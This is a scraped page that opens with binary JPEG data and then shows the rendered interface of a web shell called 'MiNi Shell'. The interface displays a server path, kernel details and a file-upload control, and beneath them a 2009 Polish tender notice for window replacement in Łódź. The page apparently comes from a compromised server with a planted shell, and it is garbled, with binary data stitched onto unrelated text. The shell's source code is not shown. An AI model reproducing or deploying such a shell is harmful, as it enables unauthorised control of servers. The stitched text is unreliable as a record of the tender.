JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090423/66067-N-2009.html

<p class="kh_header"><b>Łódź: Roboty remontowe - wymiana stolarki okiennej</b><br>
<b>Numer ogłoszenia: 66067 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Polesie "Zielony Rynek" , Pl. Barlickiego 11, 90-615 Łódź, woj. łódzkie, tel. 042 6330180, faks 042 6339607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zielonyrynek.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Administracja Nieruchomościami.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe - wymiana stolarki okiennej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem     zamówienia    jest    wykonanie   wraz   z   montażem    stolarki    otworowej okiennej   w   ilości   97  szt  / 274,59 m2    wraz    z      parapetami     wewnętrznymi    w    ilości  52,46  m2   zakresie:
1.Stolarki  okiennej : 
         > wykonanej    z    profili   PCW  minimum   trzykomorowych   w   kolorze   białym   lub   z   profili      
             drewnianych    klejonych   warstwo    w    kolorze  naturalnym;
         > szyba    zespolona    niskoemisyjna    poprawiająca   komfort    w   mieszkaniu    i   przyczyniająca   
             się   w    sposób    istotny    do    oszczędności     energii   i    emisji    hałasu     o    współczynniku   
             przenikania  ciepła  K <1,1;
         > wszystkie  skrzydła  rozwieralne oraz jedno  z  funkcją  uchylo - rozwieralną  z   mikrowentylacją;
         > okucia  obwiedniowe ;
         >  słupek   w   nowej   stolarce   powinien   być   zachowany    jak   w    obecnie  istniejącej   stolarce  
              ( stały  lub  ruchomy  );
      Wykonaną  nową   stolarkę   należy   mocować   w   sposób  trwały. Zamocowania   ościeżnic    należy     
      dokonać    za    pomocą    łączników   typu   zaczep.  Zamocowane    okno    należy    uszczelnić    pod 
      względem    termicznym     poprzez    wypełnienie     szczelin     między      ościeżnicą     a    ościeżem     
      materiałem     izolacyjnym      dopuszczonym      do     stosowania    dla    tego    celu.
      Do    uszczelnienia     stolarki    w    ościeżu    przed   przenikaniem   wody    opadowej   i    powietrza   
      należy   zastosować   kity  trwaleplastyczne.   
2.Parapetów  wewnętrznych - laminowanych w kolorze białym osadzonych w ościeżach i pod oknem.
W   w/w   zakres    realizacji     zamówienia    wchodzi:
       -  przed    przystąpieniem    do    realizacji    robót    wykonanie     dokładnych    pomiarów     stolarki; 
       -  wykonanie   stolarki    w   warunkach   warsztatowych   lub  metodą   przemysłową   w     fabrykach    
          okien;
  - wymianie   stolarki   istniejącej   / zużytej /    na    nowo wykonaną   wraz   z   wymianą    parapetów   
    wewnętrznych ,
  - transport    stolarki    na    miejsce    obsadzenia ,
       -  naprawa   -   uzupełnienie   tynków   wewnętrznych   i   zewnętrznych   w   ościeżach      okiennych     
          zaprawą   cementową    z    uzupełnieniem     ewentualnych    ubytków    cegieł.
         Dopuszcza    się     naprawę    ościeży     wewnętrznych     przy     użyciu     płyt     karton  - gips.
 - wywóz    stolarki    zdemontowanej ,   gruzu   i   rumowia.
3.Prace związane z wymianą stolarki prowadzone będą w zasiedlonych lokalach mieszkalnych, których  wykaz  stanowi  - załącznik  nr 1.  
4.W przypadku wystąpienia istotnych okoliczności, Zamawiający zastrzega sobie prawo do zamiany, zmniejszenia lub zwiększenia liczby lokali wytypowanych do wymiany stolarki w ramach ogólnej kwoty przewidzianej na zrealizowanie zamówienia.  
5.O ewentualnych zmianach w wykazie stolarki przewidzianej do wymiany Zamawiający zawiadomi Wykonawcę niezwłocznie po uzyskaniu takiej wiedzy. 
6.Ostateczne rozliczenie nastąpi na podstawie rzeczywiście wymienionej powierzchni stolarki z zachowaniem ceny ryczałtowej za 1 m2.  
7.Zamawiający przyjął konieczność wymiany istniejących parapetów przy każdym oknie. Wykazana w formularzu cenowym  -  załącznik nr 2a szacunkowa ilość parapetów stanowić będzie podstawę do ustalenia wartości oferty oraz ceny ryczałtowej za 1m2  wymiany parapetów. Ostateczne    rozliczenie nastąpi  na  podstawie  rzeczywiście wymienionej powierzchni parapetów z zachowaniem ceny ryczałtowej za 1 m2.  
8.Wykonana nowa stolarka musi zachować istniejący kształt i  podział skrzydeł.    
9.Przed złożeniem oferty należy dokonać oględzin obiektów. 
10.Roboty należy wykonać zgodnie z obowiązującymi przepisami techniczno - budowlanymi, Polskimi Normami  oraz zasadami wiedzy technicznej oraz Rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003 r w sprawie informacji dot. bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz.U z 2003 Nr 120 poz. 1126) oraz Rozporządzeniem Ministra Infrastruktury z dnia 06.02.2003 r w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych  (Dz.U z 2003 Nr 47 poz. 401).  
11.Zamawiający zastrzega sobie prawo żądania od wykonawcy przedłożenia atestów i certyfikatów od wbudowanych materiałów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.00.00-7, 45.42.11.32-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O  udzielenie    zamówienia     mogą    ubiegać    się     wykonawcy,   którzy:
   1)  Posiadają    uprawnienia    do    wykonywania    określonej    działalności    lub    czynności. 

   2)  Posiadają    niezbędną   wiedzę   i   doświadczenie    oraz    dysponują   potencjałem  technicznym    
        i    osobami    zdolnymi     do    wykonania   zamówienia.

   3) Znajdują  się  w  sytuacji  ekonomicznej  i  finansowej   zapewniającej   wykonanie    zamówienia.

   4) Nie    podlegają    wykluczeniu    z    postępowania   o   udzielenie    zamówienia    na    podstawie   
        art . 24 ust.1 i  2    ustawy    Prawo   zamówień   publicznych.   

    5) Spełniają   warunki    gwarancyjne   -    okres    udzielonej   gwarancji    na    wykonanie  przedmiotu   
         zamówienia     musi     wynosić    120 miesięcy.  

    6) Wykażą ,  że   oferowana   stolarka    dopuszczona  jest  do  obrotu   i  stosowania   w  budownictwie   
         mieszkaniowym.                       
                                                                                                            
2.  Sposób   dokonywania    oceny    spełnienia   w/w   warunków:

 ad 1)   warunek   spełniają  wykonawcy,  którzy   prowadzą   działalność   gospodarczą   zgodną    z   
            przedmiotem  zamówienia; 

 ad 2) >  warunek  spełniają  wykonawcy,  którzy  w  okresie  ostatnich  pięciu  lat  przed  wszczęciem   
                postępowania,  a  jeżeli  okres   prowadzenia  działalności   jest   krótszy  -   w   tym   okresie  
                wykonywali  należycie minimum  trzy  roboty o wartości min. 100 000 zł każda odpowiadające  
                 swoim rodzajem robotom  stanowiącym  przedmiot  zamówienia;
             > dysponują  osobami   posiadającymi   wymagane  uprawnienia  do  wykonania  zamówienia,  
        	     jeżeli   ustawy   nakładają  obowiązek   posiadania   takich  uprawnień, lub posiadają pisemne 	     zobowiązanie innych podmiotów do udostępnienia im potencjału technicznego i osób zdolnych 	     do wykonania zamówienia;

    ad 3)  warunek  spełniają wykonawcy, którzy  posiadają  polisę  lub  inny  dokument  potwierdzający 
               że  są ubezpieczeni  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności .
 
    ad 4)  warunek   spełniają  wykonawcy,  którzy   załączą   do   oferty    oświadczenie   o   spełnieniu  
              warunków  udziału  w  postępowaniu  i  dokumenty  wymienione  w  części  V. 

    ad 5)   warunek   spełniają   wykonawcy,  którzy   na   wykonanie   przedmiotu   zamówienia  udzieloną     
               120  miesięcy   gwarancji.

   ad 6)   warunek    spełniają    wykonawcy,    którzy    wykażą ,  że   oferowana    stolarka    dopuszczona   
               jest    do    obrotu     i      stosowania     w    budownictwie     mieszkaniowym..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W   celu   potwierdzenia,  że    wykonawca   posiada   uprawnienia    do   wykonywania    określonej   
   działalności  lub  czynności  oraz   nie  podlega   wykluczeniu  na  podstawie  art.24  ustawy Prawo  
   zamówień   publicznych    do   oferty    należy    załączyć : 
 
1.1 aktualny    odpis     z    właściwego     rejestru     albo  aktualne    zaświadczenie    o     wpisie     do   
      ewidencji     działalności   gospodarczej,  jeżeli   odrębne  przepisy   wymagają  wpisu  do   rejestru   
      lub   zgłoszenia   do  ewidencji  działalności   gospodarczej,  wystawiony    nie   wcześniej    niż  6   
      miesięcy   przed  upływem  terminu   składania  ofert .
1.2 oświadczenie,  że  spełnia  warunki  udziału  w  postępowaniu, o których  mowa  w  art. 22 ust.1    
       i   art.24   ustawy   Prawo   zamówień   publicznych (zał. nr  3);
1.3 w  przypadku   składania   oferty    przez podmioty   występujące   wspólnie  dokumenty 
       wyszczególnione w pkt.1.1  i  1.2    muszą    być    złożone   przez    każdy   podmiot;
1.4  pełnomocnictwo    w    przypadku    podmiotów    występujących     wspólnie   o     ustanowieniu   
      pełnomocnika    do  reprezentowania  ich   w   postępowaniu   o   udzielenie    zamówienia    albo  
      reprezentowania  w   postępowaniu  i  zawarciu  umowy  w   sprawie   zamówienia   publicznego. 

2. W   celu    potwierdzenia,   że    wykonawca    posiada     niezbędna    wiedzę   i    doświadczenie    oraz     
     dysponuje     potencjałem    technicznym     i     osobami     zdolnymi      do    wykonania    zamówienia
     do  oferty  należy  załączyć :

   2.1 wykaz   wykonanych   w    ciągu   ostatnich  pięciu   lat  przed  wszczęciem  postępowania, a  jeżeli  
         okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie, robót o   wartości  min. 100 000 zł 	 każda  odpowiadających  swym   zakresem  przedmiotowi  zamówienia  (min.  3 )   ;
   2.2 dokumenty potwierdzające, że  (min.  3 )  roboty wymienione w w/w wykazie zostały wykonane  
         należycie;
   2.3 kserokopie    dokumentu     potwierdzającego    kwalifikacje    osoby     mającej     pełnić     funkcję   
         kierownika  budowy    wraz    z     zaświadczeniem    o    wpisie    na    listę    członków   Okręgowej    
         Izby   Inżynierów  Budownictwa. 

3. W   celu   potwierdzenia,   że    wykonawca   znajdują    się   w   sytuacji  ekonomicznej   i   finansowej    
    zapewniającej   wykonanie    zamówienia   do   oferty    należy    załączyć :

   3.1 kserokopie  polisy  lub  innego  dokumentu   ubezpieczenia  potwierdzającego,  że    wykonawca  
         jest  ubezpieczony  od  odpowiedzialności  cywilnej    w    zakresie    prowadzonej     działalności
         obejmującej  okres  realizacji  prac;
   3.2  w   przypadku     załączenia    dokumentu    zawartego    na    okres  krótszy,   do   oferty   należy    
          dołączyć    zobowiązanie    o    przedłużeniu    ważności  ubezpieczenia.
   3.3  w przypadku , gdy    wykonawca  nie  posiada  ubezpieczenia OC,   do  oferty   należy   dołączyć    
          zobowiązanie    mówiące,   o    ubezpieczeniu    robót    przed    podpisaniem   umowy;        

4. W    przypadku   składania     oferty     przez     podmioty     występujące     wspólnie    dokumenty  
     wyszczególnione w pkt.2  i  3  podmioty    mogą    spełniać    łącznie;

5.  W   celu   potwierdzenia,   że    że   oferowana   stolarka    dopuszczona  jest  do  obrotu   i  stosowania    
      w    budownictwie    mieszkaniowym    do   oferty    należy    załączyć :  

    5.1 aktualny   Atest   Państwowego   Zakładu    Higieny   z  wyraźnym    zaznaczeniem ,  iż   oferowana    
          stolarka   dopuszczona    jest    do  stosowania    w    budownictwie.          

5.2aktualny    Certyfikat     Zgodności       z      Aprobatą      Techniczną      lub     Krajową    Deklaracją
Zgodności   do     Aprobaty    Technicznej     na    stolarkę,    zgodnie    z   Rozporządzeniem Ministra Infrastruktury  z dnia  11 sierpnia 2004 r  Dz U z 2004 r Nr 198 poz.2041   w  sprawie sposobu  deklarowania  zgodności  wyrobów  budowlanych   oraz  sposobu   znakowania  ich znakiem  budowlanym.       

6. Jeżeli   wykonawca   ma    siedzibę  lub   miejsce  zamieszkania   poza  terytorium  Rzeczypospolitej  
    Polskiej,  zamiast   dokumentów,  o  których  mowa  w  pkt.1.1  składa   dokument   lub  dokumenty,  
    wystawione  w   kraju,  w   którym    ma    siedzibę    lub   miejsce    zamieszkania,    potwierdzające  
    odpowiednio, że:

    6.1  nie  otwarto jego  likwidacji ani  nie  ogłoszono  upadłości;
    
7. Dokumenty,  o  których   mowa   w  pkt. 6.1  powinny   być  wystawione  nie   wcześniej  niż   
    6 miesięcy  przed upływem terminu  składania ofert. 
 
8. Jeżeli  w  kraju  pochodzenia  osoby   lub  w kraju, w którym  wykonawca  ma  siedzibę lub  miejsce  
    zamieszkania,  nie wydaje  się  dokumentów, o których mowa w pkt.1  zastępuje sie je dokumentem  
    zawierającym    oświadczenie    złożone    przed    notariuszem,  właściwym    organem    sądowym,  
    administracyjnym  albo  organem  samorządu  zawodowego lub gospodarczego, odpowiednio kraju  
    pochodzenia  osoby  lub  kraju , w  którym  wykonawca  ma  siedzibę  lub  miejsce  zamieszkania.

9.Dokumenty   składane   w   języku   obcym  składane   są  wraz  z  tłumaczeniem   na   język   polski  
   poświadczonym  przez  wykonawcę.

10.Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zielonyrynek.internetdsl.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź - Polesie Zielony Rynek
pl. Barlickiego 11
pok. nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 10:00, miejsce: Administracja Nieruchomościami Łódź - Polesie Zielony Rynek
pl. Barlickiego 11
pok. nr 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com